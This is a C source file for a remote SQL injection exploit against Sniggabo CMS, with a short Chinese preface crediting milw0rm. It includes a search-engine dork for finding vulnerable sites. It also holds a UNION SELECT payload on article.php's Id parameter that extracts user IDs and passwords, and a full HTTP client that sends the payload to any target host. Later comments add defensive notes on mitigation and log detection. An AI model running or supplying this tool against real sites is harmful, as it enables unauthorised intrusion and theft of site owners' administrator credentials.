|
感谢milw0rm的工作人员提供漏洞信息,这个漏洞没有exp,顺手写之。
/*
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Code by 2y30r
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
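/*
 * Http_GET - send one HTTP/1.1 GET request over TCP and return the reply text.
 *
 * host: server name, resolved with gethostbyname() (IPv4 only).
 * port: TCP port in host byte order.
 * data: request target, placed verbatim on the request line.
 *
 * Returns a NUL-terminated string holding the bytes delivered by a single
 * recv() call, or an empty string when anything fails (the reason is written
 * to stderr). The string lives in a static buffer: it is overwritten by the
 * next call, must not be freed, and the function is not reentrant.
 *
 * The earlier version returned the address of a stack array, copied
 * sizeof(char *) bytes into a 4-byte address field, formatted the request
 * with an unbounded sprintf(), never terminated the received data, ignored
 * every return value and leaked the socket.
 */
char *Http_GET(char *host,int port,char *data)
{
    static char response[204800];
    char http_request[2048];
    struct hostent *resolved;
    struct sockaddr_in remote_host;
    int sock;
    int req_len;
    ssize_t moved;

    response[0] = '\0';

    if (host == NULL || data == NULL) {
        fprintf(stderr, "Http_GET: missing host or request target\n");
        return response;
    }

    resolved = gethostbyname(host);
    if (resolved == NULL || resolved->h_addrtype != AF_INET
        || resolved->h_length != (int)sizeof(remote_host.sin_addr.s_addr)
        || resolved->h_addr_list[0] == NULL) {
        fprintf(stderr, "Http_GET: cannot resolve an IPv4 address for %s\n", host);
        return response;
    }

    memset(&remote_host, 0, sizeof(remote_host));
    remote_host.sin_family = AF_INET;
    remote_host.sin_port = htons((unsigned short)port);
    /* Size the copy by the destination field, not by the pointer type. */
    memcpy(&remote_host.sin_addr.s_addr, resolved->h_addr_list[0],
           sizeof(remote_host.sin_addr.s_addr));

    /* Bounded formatting: a long target or host is rejected, not overflowed. */
    req_len = snprintf(http_request, sizeof(http_request),
                       "GET %s HTTP/1.1\r\nHost:%s\r\nAccept:*/*\r\n\r\n",
                       data, host);
    if (req_len < 0 || (size_t)req_len >= sizeof(http_request)) {
        fprintf(stderr, "Http_GET: request does not fit in %zu bytes\n",
                sizeof(http_request));
        return response;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("Http_GET: socket");
        return response;
    }

    if (connect(sock, (struct sockaddr *)&remote_host, sizeof(remote_host)) < 0) {
        perror("Http_GET: connect");
        close(sock);
        return response;
    }

    moved = send(sock, http_request, (size_t)req_len, 0);
    if (moved != (ssize_t)req_len) {
        perror("Http_GET: send");
        close(sock);
        return response;
    }

    /* Leave one byte free so the reply can always be terminated. */
    moved = recv(sock, response, sizeof(response) - 1, 0);
    if (moved < 0) {
        perror("Http_GET: recv");
        moved = 0;
    }
    response[moved] = '\0';

    close(sock);
    return response;
}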
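/*
 * Entry point: takes one argument of the form host[/path], appends the fixed
 * article.php query below to the path and prints the reply from Http_GET().
 *
 * What the request shows a defender: the Id parameter of article.php reaches
 * the SQL statement unmodified, so a UNION SELECT can be appended to it. The
 * query asks for userid and password from the users table, joined with '|'
 * (0x7c) and framed by "|||" markers in the page output.
 *
 * Mitigation: bind Id as an integer parameter (prepared statement) or reject
 * non-numeric values before building the query, and treat the credentials in
 * the users table as exposed on any site where such requests were served.
 * Detection: access-log entries for article.php whose query string contains
 * "union+select" or "concat_ws(".
 *
 * Exit status follows the file's existing convention: 0 when nothing was
 * sent (usage error or rejected argument), 1 after a request was attempted.
 */
int main(int argc,char *argv[])
{
    char host[256], data[1024];
    char sql[] = "/article.php?Id=-1000+union+select+concat(0x7c7c7c,concat_ws(0x7c,userid,password),0x7c7c7c)+from+users+limit 0,1/*";
    const char *path;
    char *response;
    size_t host_len;
    int written;

    if (argc != 2) {
        printf("\t\tSniggabo CMS article.php injection\n\tDork:\"powered by Sniggabo CMS\" inurl:article.php?id\nExploit By 2y30r\nUsage:%s www.target.com/path\n",argv[0]);
        return 0;
    }

    /* Everything before the first '/' is the host, the rest is the path. */
    path = strchr(argv[1], '/');
    host_len = path ? (size_t)(path - argv[1]) : strlen(argv[1]);

    /* The earlier strcpy()/strncpy() calls wrote past host[] on long input. */
    if (host_len == 0 || host_len >= sizeof(host)) {
        fprintf(stderr, "host name is empty or longer than %zu bytes\n",
                sizeof(host) - 1);
        return 0;
    }
    memcpy(host, argv[1], host_len);
    host[host_len] = '\0';

    /* Bounded replacement for strcpy()+strcat() into data[]. */
    written = snprintf(data, sizeof(data), "%s%s", path ? path : "", sql);
    if (written < 0 || (size_t)written >= sizeof(data)) {
        fprintf(stderr, "path is too long for the %zu-byte request buffer\n",
                sizeof(data));
        return 0;
    }

    response = Http_GET(host,80,data);
    printf("%s\n", response ? response : "");
    return 1;
}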
|